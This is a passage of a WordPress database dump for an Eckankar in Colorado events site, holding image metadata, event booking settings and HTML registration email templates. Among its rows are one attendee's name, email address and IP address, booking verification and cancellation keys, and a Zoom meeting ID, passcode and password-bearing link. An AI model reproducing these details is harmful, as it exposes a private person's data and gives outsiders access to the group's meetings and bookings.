type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"misty-path-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"misty-path-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"misty-path-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"misty-path-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"misty-path-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166738,266887,'mec_booking_location','118'),(166739,266887,'mec_ticket_price_1','0'),(166740,266887,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"zgraff@charter.net\";s:4:\"name\";s:13:\"Carolyn Graff\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"47.12.99.86\";}}'),(166741,266887,'mec_price','0'),(166742,266887,'mec_gateway','MEC_gateway_free'),(166743,266887,'mec_gateway_label','Free'),(166744,266888,'protect_children',''),(166745,266888,'mec_color',''),(166746,266888,'mec_location_id','149'),(166724,266887,'mec_verified','1'),(166725,266887,'mec_verification_key','a8158c00c26a1542e3573c216f344681'),(166726,266887,'mec_cancellation_key','682791bb9764538a084ea7dc8f881e23'),(166727,266887,'mec_confirmed','1'),(166728,266887,'mec_event_id','266604'),(166672,266884,'_wp_attached_file','2022/07/blu-butterfly-1.jpg'),(166673,266884,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:740;s:6:\"height\";i:416;s:4:\"file\";s:27:\"2022/07/blu-butterfly-1.jpg\";s:8:\"filesize\";i:112651;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"blu-butterfly-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14862;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"blu-butterfly-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7364;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:27:\"blu-butterfly-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27921;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:27:\"blu-butterfly-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45318;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:27:\"blu-butterfly-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29773;}s:8:\"tileview\";a:5:{s:4:\"file\";s:27:\"blu-butterfly-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37597;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166641,266883,'mec_advanced_days','a:0:{}'),(166642,266883,'mec_in_days',''),(166643,266883,'mec_not_in_days',''),(166644,266883,'mec_hourly_schedules','a:0:{}'),(166645,266883,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(158164,266470,'original-file','2022/03/co-ecktemple-1-updraft-pre-smush-original.jpg'),(158165,266470,'smush-complete','1'),(158166,266470,'smush-info','The file was compressed from 139.78 KB to 132.50 KB saving 5.2 percent using WP-Optimize'),(158167,266470,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:143130;s:12:\"smushed-size\";i:135683;s:15:\"savings-percent\";d:5.20000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:143130;s:10:\"compressed\";i:135683;}s:6:\"medium\";a:2:{s:8:\"original\";i:16675;s:10:\"compressed\";i:16306;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8693;s:10:\"compressed\";i:8627;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:94235;s:10:\"compressed\";i:91140;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:30572;s:10:\"compressed\";i:30006;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:52041;s:10:\"compressed\";i:50748;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:36077;s:10:\"compressed\";i:35234;}s:8:\"tileview\";a:2:{s:8:\"original\";i:38725;s:10:\"compressed\";i:37833;}}}'),(158168,266472,'original-file','2022/03/misty-path-1-updraft-pre-smush-original.jpg'),(158169,266472,'smush-complete','1'),(158170,266472,'smush-info','The file was compressed from 66.65 KB to 64.34 KB saving 3.47 percent using WP-Optimize'),(158171,266472,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:68249;s:12:\"smushed-size\";i:65881;s:15:\"savings-percent\";d:3.470000000000000195399252334027551114559173583984375;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:68249;s:10:\"compressed\";i:65881;}s:6:\"medium\";a:2:{s:8:\"original\";i:11403;s:10:\"compressed\";i:11378;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:4615;s:10:\"compressed\";i:4549;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:14559;s:10:\"compressed\";i:14559;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:27452;s:10:\"compressed\";i:27452;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19393;s:10:\"compressed\";i:19393;}s:8:\"tileview\";a:2:{s:8:\"original\";i:15609;s:10:\"compressed\";i:15609;}}}'),(158172,266474,'mec_color',''),(158173,266474,'mec_location_id','118'),(158174,266474,'mec_dont_show_map','0'),(158175,266474,'mec_organizer_id','1'),(158176,266474,'mec_read_more',''),(158177,266474,'mec_more_info',''),(158178,266474,'mec_more_info_title',''),(158179,266474,'mec_more_info_target','_self'),(158180,266474,'mec_cost',''),(158181,266474,'mec_currency','a:0:{}'),(158182,266474,'mec_additional_organizer_ids','a:0:{}'),(158183,266474,'mec_additional_location_ids','a:0:{}'),(158184,266474,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-04-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-04-09\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(158185,266474,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(158186,266474,'mec_certain_weekdays','a:0:{}'),(158187,266474,'mec_allday','0'),(158188,266474,'one_occurrence','0'),(158189,266474,'mec_hide_time','0'),(158190,266474,'mec_hide_end_time','0'),(158191,266474,'mec_comment',''),(158192,266474,'mec_timezone','global'),(158193,266474,'mec_countdown_method','global'),(158194,266474,'mec_public','1'),(158195,266474,'mec_start_date','2022-04-09'),(158196,266474,'mec_start_time_hour','10'),(158197,266474,'mec_start_time_minutes','30'),(158198,266474,'mec_start_time_ampm','AM'),(158199,266474,'mec_start_day_seconds','37800'),(158200,266474,'mec_end_date','2022-04-09'),(158201,266474,'mec_end_time_hour','11'),(158202,266474,'mec_end_time_minutes','30'),(158203,266474,'mec_end_time_ampm','PM'),(158204,266474,'mec_end_day_seconds','84600'),(158205,266474,'mec_repeat_status','0'),(158206,266474,'mec_repeat_type',''),(158207,266474,'mec_repeat_interval','1'),(158208,266474,'mec_repeat_end',''),(158209,266474,'mec_repeat_end_at_occurrences',''),(158210,266474,'mec_repeat_end_at_date',''),(158211,266474,'mec_advanced_days','a:0:{}'),(158212,266474,'mec_in_days',''),(158213,266474,'mec_not_in_days',''),(158214,266474,'mec_hourly_schedules','a:0:{}'),(158215,266474,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(158216,266474,'mec_tickets','a:0:{}'),(158217,266474,'mec_fees_global_inheritance','1'),(158218,266474,'mec_fees','a:0:{}'),(158219,266474,'mec_ticket_variations_global_inheritance','1'),(158220,266474,'mec_ticket_variations','a:0:{}'),(158221,266474,'mec_reg_fields_global_inheritance','1'),(158222,266474,'mec_reg_fields','a:0:{}'),(158223,266474,'mec_bfixed_fields','a:0:{}'),(158224,266474,'mec_op','a:0:{}'),(158225,266474,'mec_fields','a:0:{}'),(158226,266474,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9834:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: 